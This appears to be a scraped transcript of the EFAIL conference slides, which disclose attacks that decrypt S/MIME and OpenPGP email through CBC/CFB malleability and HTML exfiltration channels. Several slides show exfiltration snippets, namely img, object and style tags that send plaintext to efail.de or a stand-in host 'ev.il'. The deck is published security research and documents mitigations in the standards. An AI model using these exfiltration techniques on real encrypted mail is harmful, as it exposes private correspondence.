efail - usenix · pgp-encrypted facebook password recovery •211 guesses to break every email...
TRANSCRIPT
![Page 1: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/1.jpg)
EFAILBREAKING S/MIME AND OPENPGP EMAIL ENCRYPTION USING EXFILTRATION CHANNELS
30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 1
Damian Poddebniak1, Christian Dresen1, Jens Müller2, Fabian Ising1, Sebastian Schinzel1, Simon Friedberger3, Juraj Somorovsky2, Jörg Schwenk2
1 Münster University of Applied Sciences2 Ruhr University Bochum3 NXP Semiconductors
[email protected] | https://www.efail.de
![Page 2: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/2.jpg)
Nation state attackers
• Massive collection of emails
• Snowden revelations on pervasive surveillance
Breach of email provider / email account
• Single point of failure
• Aren’t they reading / analyzing my emails anyway?
Insecure transport• TLS might be used – we don’t know in advance!
30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 2
Motivation for email encryption
![Page 3: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/3.jpg)
OpenPGP (RFC 4880)
• Favored by privacy advocates
• Web-of-trust (no authorities)
S/MIME (RFC 5751)
• Favored by organizations
• Multi root trust hierarchies
3
Email e2e encryptionTWO COMPETING STANDARDS
![Page 4: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/4.jpg)
30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 4
Security of email encryption
?
Request/response protocols Email is non-interactive
![Page 5: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/5.jpg)
Forcing an email client to send responses via backchannels
• HTML/CSS
• Email header
• Attachment preview
• Certificate verification
5
Backchannel techniques
<img src="http://efail.de"><object data="ftp://efail.de"><style>@import '//efail.de'</style>...
Disposition-Notification-To: [email protected]: http://efail.deX-Image-URL: http://efail.de…OCSP, CRL, intermediate certsPDF, SVG, VCards, etc.
![Page 6: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/6.jpg)
Windows
Linux
macOS
iOS
Android
Webmail
Webapp
OutlookIBM Notes
PostboxFoxmail
Live MailPegasus
The Bat!Mulberry
eM Client
Thunderbird
EvolutionKMailTrojitá
ClawsMutt
Apple Mail Airmail MailMate
Mail App CanaryMail Outlook
K-9 MailR2Mail
MailDroidNine
GMailOutlook.com
Yahoo!iCloud
GMXHushMail
Mail.ruFastMail
Roundcube
RainLoop AfterLogicHorde IMP
ProtonMailMailfence
MailboxZoHo Mail
No user interaction
User interaction
Leak via bypass
W8MailW10MailWLMail
Mailpile
Exchange GroupWise
6
Evaluation of backchannels in email clients
Javascript execution
40/47 clients have backchannels requiring
no user interaction
![Page 7: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/7.jpg)
7
Attacker model
![Page 8: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/8.jpg)
S/MIME
30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 8
![Page 9: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/9.jpg)
30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 9
Malleability of CBC
decryption
C1
P0
decryption
C2
P1
C0
![Page 10: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/10.jpg)
1 1 1 1 1 1 1 1
30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 10
Malleability of CBC
decryption
C1
P0
decryption
C2
P1
0 0 1 0 1 0 1 0
C0
![Page 11: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/11.jpg)
1 1 1 1 1 1 1 1
30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 11
Malleability of CBC
decryption
C1
P0
decryption
C2
P1
0 1 1 0 1 0 1 0
C0
![Page 12: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/12.jpg)
1 0 1 1 1 1 1 1
30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 12
Malleability of CBC
decryption
C1
P0
decryption
C2
P1
0 1 1 0 1 0 1 0
C0
![Page 13: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/13.jpg)
1 0 1 1 1 1 1 1
30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 13
Malleability of CBC
decryption
C1
P0
decryption
C2
P1
0 1 1 1 1 0 1 0
C0
![Page 14: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/14.jpg)
1 0 1 0 1 1 1 1
30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 14
Malleability of CBC
decryption
C1
P0
decryption
C2
P1
0 1 1 1 1 0 1 0
C0
![Page 15: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/15.jpg)
1 0 1 0 1 1 1 1
30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 15
Malleability of CBC
decryption
C1
P0
decryption
C2
P1
0 1 1 1 1 0 0 0
C0
![Page 16: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/16.jpg)
1 0 1 0 1 1 0 1
30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 16
Malleability of CBC
decryption
C1
P0
decryption
C2
P1
0 1 1 1 1 0 0 0
C0
![Page 17: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/17.jpg)
1 0 1 0 1 1 0 1
30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 17
Malleability of CBC
decryption
C1
P0
decryption
C2
P1
0 1 1 1 1 0 0 0?
C0
![Page 18: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/18.jpg)
30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 18
Malleability of CBC
decryption
Content-type: te
C1
P0
decryption
xt/html\nDear Bob
C2
P1
C0
![Page 19: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/19.jpg)
30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 19
Malleability of CBC
decryption
Zontent-type: te
C1
P0'
decryption
xt/html\nDear Bob
C2
P1
C0'
![Page 20: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/20.jpg)
30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 20
Malleability of CBC
C0 ⊕ P0
decryption
0000000000000000
C1
P0'
decryption
xt/html\nDear Bob
C2
P1
CBC Gadget
![Page 21: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/21.jpg)
30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 21
Malleability of CBC
C0 ⊕ P0⊕ Pc
decryption
<img src=”ev.il/
C1
P0'
decryption
xt/html\nDear Bob
C2
P1
![Page 22: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/22.jpg)
30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 22
Malleability of CBC
decryption
Content-type: te
C1'
P0'
decryption
Zt/html\nDear Bob
C2
P1'
C0
![Page 23: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/23.jpg)
30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 23
Malleability of CBC
decryption
????????????????
C1'
P0'
decryption
Zt/html\nDear Bob
C2
P1'
C0
![Page 24: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/24.jpg)
30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 24
Attacking S/MIME
No MAC
![Page 25: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/25.jpg)
30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 25
Attacking S/MIMEPRACTICAL ATTACK AGAINST S/MIME
???????????????? <base "
???????????????? <img "
???????????????? " href="http:">
Content-type: te xt/html\nDear Sir or Madam, the se ecret meeting wi
???????????????? " src="efail.de/
Content-type: te xt/html\nDear Sir or Madam, the se ecret meeting wi
???????????????? ">
Original
Crafted
Changing Duplicating Reordering
![Page 26: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/26.jpg)
26
Practical attack against S/MIMEATTACKER MODEL
![Page 27: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/27.jpg)
OpenPGP
30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 27
![Page 28: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/28.jpg)
• OpenPGP uses a variation of CFB-Mode
• OpenPGP defines primitives for integrity protection
• Plaintext compression is enabled by default
28
Attacking OpenPGPDIFFERENCES TO S/MIME
Ci
Pi (known)
Ci+1
Pi-1
encryption encryption
XCi
encryption
Pc (chosen) random plaintext? ? ? ? ? ? ? ?
encryption
![Page 29: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/29.jpg)
29
Attacking OpenPGPDEFEATING INTEGRITY PROTECTION
Vulnerable Not Vulnerable
Client Plugin (up to version) MDC Stripped MDC Incorrect SEIP -> SE
Outlook 2007 GPG4WIN 3.0.0
Outlook 2010 GPG4WIN
Outlook 2013 GPG4WIN
Outlook 2016 GPG4WIN
Thunderbird Enigmail 1.9.9
Apple Mail (OSX) GPGTools 2018.01
MDC stripped MDC incorrect SEIP -> SE
![Page 30: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/30.jpg)
30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 30
Attacking OpenPGPRFC 4880 ON MODIFICATION DETECTION CODES
![Page 31: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/31.jpg)
• Challenge: create chosen compressed plaintext
• We present a solution for this in the paper
• In a nutshell:• Our shortest exploit needs 11 bytes of known plaintext
• The first 4 bytes are known header data
• Remaining 7 bytes have to be guessed
31
OpenPGPCOMPRESSION (DEFLATE)
? ? ? ? ? ? ?
![Page 32: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/32.jpg)
PGP-encrypted Facebook password recovery• 211 guesses to break every email
PGP-encrypted Enron dataset• 500 guesses to break 41% of the emails
Multiple guesses per email possible• Up to 1.000 MIME parts per email
32
OpenPGPGUESSING BYTES IN COMPRESSION
![Page 33: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/33.jpg)
33
![Page 34: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/34.jpg)
S/MIME standard draft - draft-ietf-lamps-rfc5751-bis-11
• References EFAIL paper
• Recommends usage of authenticated encryption
OpenPGP standard draft - draft-ietf-openpgp-rfc4880bis-05
• Deprecates Symmetrically Encrypted (SE) data packets (due to downgrade attack)
• Proposes chunk size limits for AEAD protected data packets
• Implementations should not allow users to access modified plaintexts
34
Impact on the standardsCURRENT DRAFTS
![Page 35: EFAIL - USENIX · PGP-encrypted Facebook password recovery •211 guesses to break every email PGP-encrypted Enron dataset •500 guesses to break 41% of the emails Multiple guesses](https://reader035.vdocuments.us/reader035/viewer/2022081404/5f061d917e708231d4165e0c/html5/thumbnails/35.jpg)
• Introduced malleability gadgets
• Self-exfiltrating plaintexts
• Evaluation of backchannels
• Crypto standards need to evolve• Current S/MIME is broken
• OpenPGP needs clarification
• Secure HTML email is challenging
35
Conclusions
Thank you!Questions?
https://www.efail.de/